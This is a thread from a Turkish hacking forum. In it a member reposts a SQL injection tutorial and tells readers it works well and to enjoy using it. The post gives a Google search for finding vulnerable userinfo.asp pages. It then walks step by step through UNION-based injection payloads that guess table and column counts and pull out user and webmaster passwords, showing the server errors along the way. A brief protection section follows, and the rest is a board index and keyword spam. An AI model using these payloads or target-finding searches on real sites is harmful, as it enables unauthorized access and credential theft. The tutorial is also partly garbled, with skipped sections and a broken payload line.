Ana Sayfa
Yardım
Üyeler
Giriş Yap
Kayıt
HoşGeldin Ziyretçi, Lütfen
Giriş Yap
ya da
Üye Ol
Ip Adresiniz: 38.107.179.241
Username:
1 Saat
1 Gün
1 Hafta
1 Ay
Her zaman
Password:
WwW.HacKbanK.Gen.TR
Hack, Hacker, Hacked, Hacking, Güvenlik, Güvenlik Açıkları, Programlar
HacK, Hacker ve Güvenlik Açıkları
SQL Enjection Union Açığı
Sayfa: [
1
]
Aşağı git
« önceki
sonraki »
Gönderen
Konu: SQL Enjection Union Açığı (Okunma Sayısı 441 defa)
0 Üye ve 1 Ziyaretçi konuyu incelemekte.
MuratbanK'in HacKbanK Bilgileri
MuratbanK
MuratbanK
HacKbanKlının Profilini Goster
Ozel Mesaj Gonder
Son Mesajlarını Goster
Arkadas Listeme Ekle
кαяαηℓιктαкi göякєmℓi ιşιğιηιz
¼ ™ ѕιтє кυяυ©υѕυ © ¾
ωєвмαѕтєя üує
HacKbanK lıya Ozgu Mesajı
™ кαяαmuяαтвαηк © тєкєℓуєηιяαкı=нαуαт ρєєн
Cinsiyeti
Uye Numarası (ID)
1
HacKbanK a Kayıt Tarihi
Temmuz 13, 2007, 04:26:51 ÖS
Nerden
тєкєℓуєηιяαкıηıη σℓ∂υgυ нєянαηgι вιя çιℓιηgιя ѕσƒяαѕıη∂αη
HacKbanKlının Yası: 30
HacKbanK taki Mesaj Sayısı
22317
HacKbanK Rep Puanı
Rep Puanı: 19748
Uyeyi Sikayet Et
Deneyimleri
Aktiflik
Deneyim
Seviye
HıyarlıK
HacKbanK Tecrubeleri
Paylasım
Guc/Power
Ukalalık
Tehlike Duzeyi
Iletisim Bilgileri
Ruh Halim:
SQL Enjection Union Açığı
«
:
Temmuz 23, 2007, 07:42:50 ÖS »
SQL Enjection Union Açığı
Aşağıda yazanlar alıntıdır ve güzelde işe yarıyor
googlede inurl:userinfo.asp şeklinde arayabilirsiniz
güle güle kullanın.
1. SQL Injection Nedir?
SQL injection, dinamik içerikli, yani; asp,php,jsp… gibi diller ile beraber bir veri tabanı yönetim sisteminin kullanıldığı
web sayfalarında, SQL cümlelerinin yanlış çalışmasına sebep olacak bir takım karakterlerle sistemi yanıltıp, kendi amacınıza
uygun olarak kullanmanızı sağlayan bir hack yöntemidir.
union select username,password from users where 1=1
ve enter’a basar. Sunucu aşağıdaki gibi bir hata döndürür;
Microsoft OLE DB Provider for ODBC Drivers (0x80040E37)
[Microsoft][ODBC Microsoft Access Driver] The Microsoft Jet database engine cannot find the input table or query ’users’.
Make sure it exists and that its name is spelled correctly.
HHH anladı ki tablo ismini tutturamadı. Ama o genelde kullanılan tablo isimlerini çok iyi biliyor ve deneme yanılmayla bakın
bir süre sonra şu adres satırını yazdığında sunucu ona ne diyor;
union select username,password from members where 1=1
[Microsoft][ODBC Microsoft Access Driver] The number of columns in the two selected tables or queries of a union query do not
match.
Hmmm… HHH tablo ismini tutturdu ama bu sefer alan sayısını tutturamadı. UNION’ da iki select cümlesindeki alanları eşit
olması gerektiğini hatırlayın. HHH pratik bir yöntem le bunu şu şekilde dener;
union select 1 from members where 1=1
Yine olmadı;
select 1,1 from members where 1=1
Olmadı!
union select 1,1,1 from members where 1=1
Evet!!! Şimdi HHH sayfada şunun gibi bir şey görüyor;
İsim: 1
Soyad: 1
E-posta: 1
Şimdi select içerisinde kullandığı 1 lerin yerine istediği alanları yazması yeterli. Onun istediği kullanıcının adı ve
şifresi. Tecrübesiyle şöyle bir SQL injection satırını browser’ ına yazar;
union select USERNAME,USERNAME,PASSWORD from members where 1=1
Ve tutturur. Artık gördüğüşey şu;
İsim: KurbanLIK
Soyad:Koyun
E-posta: şifre
HHH bu 10 dakika sonunda sistemi kırmayı başardı. Ama HHH’ ın asıl istediği webmaster’ ın şifresini bulmak. Basit bi şekilde
webmaster ın ID sini bulmak için, onun nick’ ine basar ve gelen sayfadaki adres satırın bakar;
Elbette; ID’ sinin 1 olduğunu öğrendi. Şimdi SQL bilgisini konuşturur
union select USERNAME,USERNAME,PASSWORD from members where ID=1
İsim: XXX
Soyad: XXX
E-posta: şifre
5. Nasıl korunuruz
-Tablo isimlerinizin başına alias dediğimiz şeyler ekleyin; Yani ‘users’ diye çok genel bir tablo ismi kullanmak yerine
‘fb_users’ gibi isimler kullanın
-www.adres.com/userinfo.asp?ID=1 gibi bir adreste almış olduğunuz ID değerini kontrol edin. Sayısal bir değer bekliyorsanız,
sayısal bir değer aldığınızdan emin olun.
-Her zaman aldığınız değerlerdeki tehlikeli karakterleri sorgulayan bir alt program yazın.
-Biraz zor ancak search engine friendly dediğimiz sisteme yönelerek sitenizi oluşturun.
www.adres.com/userinfo.asp?ID=1
yerine
www.adres.com/userinfo/1
gibi bir yapıdan bahsediyorum. Apache’ de mümkün ama IIS’ te olmaz
Moderatöre Bildir
Kayıtlı
< -- Seo4SMF Social Bookmark -->
кαяαηℓιктαкi göякєmℓi ιşιğιηιz:
™ нттρ://ωωω.нα¢квαηк.gєη.тя ©
Robot Moderator
HacKer HacK HacKeD HacKing
hacker
Mesajlar: 33206
Re: SQL Enjection Union Açığı
Posted on:
Mayıs 26, 2012, 05:51:19 ÖS
Hos Geldin Ziyaretci Arkadas. Ben Robot Moderator. HacKbanK tan Tam Anlamıyla Faydalanmak Icin Uye Olman Gerekmektedir.
indir
SQL Enjection Union Açığı indir, SQL Enjection Union Açığı download, SQL Enjection Union Açığı izle, SQL Enjection Union Açığı bul, SQL Enjection Union Açığı hack SQL Enjection Union Açığı hacked SQL Enjection Union Açığı hacking SQL Enjection Union Açığı hacker SQL Enjection Union Açığı programı SQL Enjection Union Açığı indir, SQL Enjection Union Açığı download, SQL Enjection Union Açığı izle, SQL Enjection Union Açığı smf, SQL Enjection Union Açığı kurulumu, SQL Enjection Union Açığı bul
Logged
Google Words:
SQL Enjection Union Açığı indir, SQL Enjection Union Açığı download, SQL Enjection Union Açığı izle, SQL Enjection Union Açığı bul, SQL Enjection Union Açığı programı, SQL Enjection Union Açığı hack, SQL Enjection Union Açığı hacker, SQL Enjection Union Açığı hacked, SQL Enjection Union Açığı hacking, SQL Enjection Union Açığı resimleri, SQL Enjection Union Açığı videosu, SQL Enjection Union Açığı smf, SQL Enjection Union Açığı peeh,
Sayfa: [
1
]
Yukarı git
Otomatik Tag
SQL Enjection Union Açığı, indir , download , izle , bul , SQL Enjection Union Açığı, programı , resimleri , smf , SQL Enjection Union Açığı, hack , hacker , hacked , hacker , security , support , SQL Enjection Union Açığı
« önceki
sonraki »
Gitmek istediğiniz yer:
Gitmek istediğiniz yer:
-----------------------------
Sinema, Türkçe Dublaj ve Altyazılı Yerli ve Yabancı Film
-----------------------------
=>
Sinema ve Sinema Hakkında Bilgiler
=>
Yerli Filmler
===>
Kota Dostu Yerli Filmler
===>
VCD / DVD Yerli Filmler
===>
Yüksek Kaliteli Yerli Filmler
===>
Torrent Yerli Filmler
=>
Yabancı Filmler
===>
Kota Dostu Yabancı Filmler
===>
VCD / DVD Yabancı Filmler
===>
Yüksek Kaliteli Yabancı Filmler
===>
Torrent Yabancı Filmler
=>
Animasyon ve Çizgi Filmler
=>
Belgeseller
=>
Online; Yerli ve Yabancı Sinema, Anime, Çizgi ve Belgesel Filmler
-----------------------------
Kanal Kanal Yerli Diziler
-----------------------------
=>
KANAL D Dizileri
===>
Fatmagül'ün Suçu Ne
===>
Öyle Bir Geçer Zaman Ki
===>
Arka Sokaklar
===>
Kanıt
===>
Umutsuz Ev Kadınları
===>
Kuzey Güney
===>
Yalan Dünya
===>
Keşanlı Ali Destanı
=>
SHOW TV Dizileri
===>
Pis 7'li
===>
Türk'ün Uzayla İmtihanı
===>
M.U.C.K
===>
Adını Feriha Koydum
===>
Eve Düşen Yıldırım
===>
Suskunlar
===>
Yetenek Sizsiniz Türkiye
===>
Survivor Ünlüler - Gönüllüler
=>
FOX TV Dizileri
===>
Yer Gök Aşk
===>
Lale Devri
===>
Unutma Beni
===>
Araf Zamanı
===>
Babam İçin
=>
STAR TV Dizileri
===>
Muhteşem Yüzyıl
===>
Beni Affet
===>
Behzat Ç.
===>
Koyu Kırmızı
===>
İffet
===>
Firar
===>
1 Erkek 1 Kadın
=>
ATV Dizileri
===>
Çocuklar Duymasın
===>
Yahşi Cazibe
===>
Hayat Devam Ediyor
===>
Son
===>
Al Yazmalım
===>
Alemin Kralı
===>
Uçurum
=>
TRT Dizileri
===>
Bir Zamanlar Osmanlı Kıyam
===>
Sakarya Fırat
===>
Elde Var Hayat
===>
Leyla İle Mecnun
===>
Seksenler
===>
Kurt Kanunu
=>
Kurtlar Vadisi
=>
Diğer Yerli Diziler
-----------------------------
Yabancı Diziler
-----------------------------
=>
Dragon Ball
=>
The Sarah Connor Chronicles
=>
Yabancı Diziler
-----------------------------
Hack, Hacker, Hacked, Hacking, Güvenlik, Güvenlik Açıkları, Programlar
-----------------------------
=>
HacK, Hacker ve Güvenlik Açıkları
===>
Güncel ve Kişiye Özel Premium Şifre Paylaşım Alanı
=>
Güvenlik / Security
===>
Şifreleme Araçları ve Programları
===>
Antivirüsler
=> Program Deposu
===> Resimli Prgram Anlatımı
=>
HacK TeaM
=>
YARDIMLAŞMA
=>
BanneD
-----------------------------
Forum Kullanımı, Tanışma, Anketler, Eleştiriler, İstekler, Öneriler, Duyurular
-----------------------------
=>
HACKBANK FORUM KULLANIMI
===>
Forum Kuralları
===>
NicKiniz@HacKbanK.Gen.TR MSN Adres İstekleriniz ve Üye İsim Değişikliği Başvurusu Alanı
===>
YÖNETİM EKİBİ
===>
Haftanın ve Ayın: Üyeleri ve Konuları
=>
HEY BEN DE BURDAYIM DİYENLER
=>
ANKETLER
=>
Eleştirileriniz & Önerileriniz & İstekleriniz & Duyurular
===>
Özel Günler
===>
Kırmızı Koltuk
=> KONU DIŞI
=> ARŞİV
-----------------------------
Webmaster, SMF, MSN, Bilgisayar, Donanım, Yazılım, Network, İnternet, GSM, Elektrik Elektronik
-----------------------------
=> WebMaster
===> WebMaster Makaleler
=> Web Tasarım
===> Grafik Tasarım
===> Site Tanıtım
=> Simple Machines Forum SMF
=> PC / Bilgisayar
===> Donanım
===> Yazılım (HTML, PHP, ASP, C# vs)
===> PC Haberleri
===> Wallpaper
=> İşletim Sistemleri
===> Windows
===> Linux
===> Macintosh
===> Pardus
=> Network / İnternet
===> MSN
=> Elektronik Programlar ve Şemalar, Oto Elektrik Dersleri
=> Cep Telefonu Ve GSM Dünyası
-----------------------------
Haberler, Müzik, MP3, Şiir, Kitap, Aşk-Sevgi, Resim Galerisi; 18+ İçerikler ve Korku
-----------------------------
=> Türkiye'den ve Dünya'dan Haberler
=> Müzik, Klipler, Enstrümentaller, Türküler, Hikayeler, MP3
===> TürKçe MP3 İndir / DownloaD
===> Yabancı MP3 İndir / DownloaD
=> Şiirler / Sözler
=> Kitaplar / Dergiler
=> Aşka ve Sevgiye Dair Yazılar, Hikayeler ve Resimler
=> Resim ve Video Galerisi
===> İlginç Resimler
===> Komik Resimler ve Videolar
===> Karikatürler
=> 18+ İçerikler
===> 18+ Fıkralar
===> 18+ Hikaye ve Yazılar
===> 18+ Resimler ve Videolar
===> Korku Tüneli
-----------------------------
Geyik Muhabbetleri, Komik ve Matrak Yazılar, Oyun Tanıtım ve İndirme Alanı, Satranç Evreni, Hayvanlar Alemi, Bitki Dünyası, Uzay
-----------------------------
=> Güldüren Fıkralar
=> Komik, Matrak ve Geyik Yazılar
=> Şen Şakrak Hikayeler
=> Sohbet ve Muhabbet
=> Bilgisayar Oyunları, Tam Çözümleri, Oyun Hileleri, Oyun İndirme Merkezi
===> Oyun Hileleri
===> Oyun Deposu İndirme Merkezi
=> Flash Oyunlar, Bilmece Bulmaca ve Forum Oyunları
===> Bilmeceler ve Bulmacalar
===> Forum Oyunları
=> Satranç Evreni
=> Hayvanlar Alemi
=> Bitki Dünyası
=> Uzay / Feza / Evren
-----------------------------
Genel Kültür ve Genel Yetenek, Türkiye ve Dünya, Dinler
-----------------------------
=> Mustafa Kemal ATATÜRK
=> Bilim ve Teknik
=> Türk Dili ve Edebiyatı, Dünya Edebiyatı
=> Tarih
===> Anlı Şanlı Osmanlı Tarihi
=> Coğrafya ve Turizm
=> Hukuk
=> Ülkemiz: Türkiye
===> Bölgelerimiz
===> Şehirlerimiz
===> Üniversitelerimiz
===> Meslekler Rehberi
=> Dünya Ülkeleri
=>
Dinimiz: İslamiyet
=> Diğer Dinler
-----------------------------
Hayata Dair (Sağlıktan Tariflere, İlişkilerden Yaşam Hikayelerine) Ne Var Ne Yoksa
-----------------------------
=> Yaşamdan Kesitler, Alıntılar, Hikayeler, Testler ve Yazılar
===> Psikoloji / Psikiyatri
===> Onkoloji / Kanser
===> Diabet / Şeker Hastalığı
===> Çocuk Hastalıkları
===> Alternatif Tıp
=> Mutfaktayız (Yiyecek ve İçecek Tarifleri) ve Diyetler
===> Diyetler
=> Rüya Tabirleri
=> Biyografiler
===> Yerli Biyografiler
===> Yabancı Biyografiler
===> Hayali ve Süper Kahraman Biyografileri
=> İkili İlişkiler
=> HacKbanK Özel Paylaşım Alanı
===> Günün Sözü Panosu
===> Dert Ortağım Köşesi
===> İtiraflar
===> Günlük (Seyir Defteri)
-----------------------------
Kadınlar Kulübü ve Burçlar
-----------------------------
=> Anneler ve Çocukları
=> Kadınca
===> Saç ve Makyaj ve Cilt Bakımı
===> Moda
===> Pratik Bilgiler
===> Kadın Hastalıkları
=> Astroloji ve Burçlar
===> Koç
===> Boğa
===> İkizler
===> Yengeç
===> Aslan
===> Başak
===> Terazi
===> Akrep
===> Yay
===> Oğlak
===> Kova
===> Balık
-----------------------------
Erkekler Kulübü ve Spor Bölümü
-----------------------------
=> Babalar ve Çocukları
=> Motorlu Taşıtlar
===> Modifikasyon Araçlar
=> Futbol Meydanı
===> Beşiktaş/BJK
===> FenerBahçe
===> GalataSaray
===> TrabzonSpor
===> Diğer Klüpler
=> Diğer Spor Dalları
=> Erkekçe
-----------------------------
Formula 1
-----------------------------
=> Formula 1; Genel Bilgiler, Sıralama ve Yarış Verileri
=> Formula 1 Haberler
=> Formula 1 Tüm Sezonlar İndir ve İzle Padoğu
-----------------------------
ÇÖP VARİLİ
-----------------------------
=> ÇÖP BİDONU
-----------------------------
YÖNETİM MERKEZİ
-----------------------------
=> Yönetim Merkezi
Yükleniyor...